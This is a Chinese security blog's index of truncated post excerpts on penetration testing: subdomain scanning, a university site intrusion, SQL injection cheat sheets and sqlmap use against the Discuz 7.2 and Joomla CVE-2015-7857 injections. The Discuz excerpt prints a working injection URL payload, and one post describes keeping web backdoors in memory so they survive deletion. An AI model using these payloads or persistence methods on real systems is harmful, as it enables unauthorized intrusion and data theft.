信息收集

BBScan — 一个信息泄漏批量扫描脚本

有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名。 如果把这30万个域名全部扔给wvs,APPscan这样的重量级扫描器,显然是不合适的。 对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢? 试试信息泄漏批量扫描脚本 BBScan。 https://github.com/lijiejie/BBScan BBScan是…继续阅读 »
渗透测试

对哈尔滨某大学的一次检测

目标:http://www.xxx.edu.cn/ 一个大学有着很庞大的数据,以及十分明细的部门分工,并且主站一般都是做的很严谨,所以可以选择直接从分站入手,由于分站数量过多,安全自然也就显得乏力了。 翻出layer子域名挖掘机 轻松翻出一大堆的子域名 Awvs果然是神器,很快便报出一个红色高危漏洞 …继续阅读 »
渗透测试

sqlmap利用 Discuz 7.2 faq.php 注入漏洞的方法

老漏洞 不做详细介绍   sqlmap比起网上的脱库工具更灵活 更可靠 更稳定 有效率   exp http://7kb.org/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables group by x)a)%23 sqlmap 构造为 sqlmap.py -u "http://www.7kb.org/faq.php?actio…继续阅读 »
信息收集

收集子域名的两款工具的效果对比

      安全评估的第一步是最大程度地收集目标系统的信息,这同样也是渗透测试的关键性步骤。信息的收集和分析伴随着渗透测试的每一个步骤。实现信息收集有很多种方法,例如:使用搜索引擎、扫描器或发送特殊构造的HTTP请求等,这些手段都可以使服务器端的应用程序返回一些错误信息或系统运…继续阅读 »
渗透测试

sqlmap利用 Joomla 3.2.0 – 3.4.4 (CVE-2015-7857) 注入漏洞的方法

最近出了一个 Joomla的注入 影响大批网站 随后有人在sebug上给出了exp   漏洞详细说明与利用方法:https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ 存在SQL注入的地方位于:/administrator /components /com_contenthistory/ models/history.php   直接…继续阅读 »
渗透测试

SQL注入速查表(下)与Oracle注入速查表

SQL注入速查表(下)与Oracle注入速查表   一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S) 实例 BENCHMARK()(M) 实例 pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试 一些其他的MySQL笔记 MySQL中好用的…继续阅读 »
渗透测试

SQL注入速查表(上)

SQL注入速查表(上)   0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句,而经常发生变化。 样例仅用于读者理解对于“可能出…继续阅读 »
渗透测试

记某次授权渗透

目标:www. masaike.com 目标使用程序:dedecms 版本:20120621 依稀记得2012这个版本爆出过 download.php文件的getshell漏洞,果断上手试试: 显示404,getshell失败,不知道是被拦截了还是漏洞补丁过。 继续在网上搜了下这个版本的织梦漏洞,发现了几个上传漏洞,但是需要注册账号。 注册…继续阅读 »
渗透测试

Kali 2.0将在8月12日发布

Kali Linux 前身是 BackTrack(基于ubuntu),是一个基于 Debian 的 Linux 发行版,包含很多安全和取证方面的相关工具。支持 ARM架构。 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试 和 黑客攻防。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来…继续阅读 »
渗透测试

关于web后门权限防删的一个新思路

看见土司有一帖子 具体看下面连接 https://www.t00ls.net/thread-26444-1-2.html   这是php的   其实IIS也有类似的 这是MSF生成的一个ASPX执行shellcode的代码 执行后即使删掉文件 程序依然还在内存里 而且是以提供web服务的程序权限执行的     7kb.org 原创,如有转载请注明出处 www.…继续阅读 »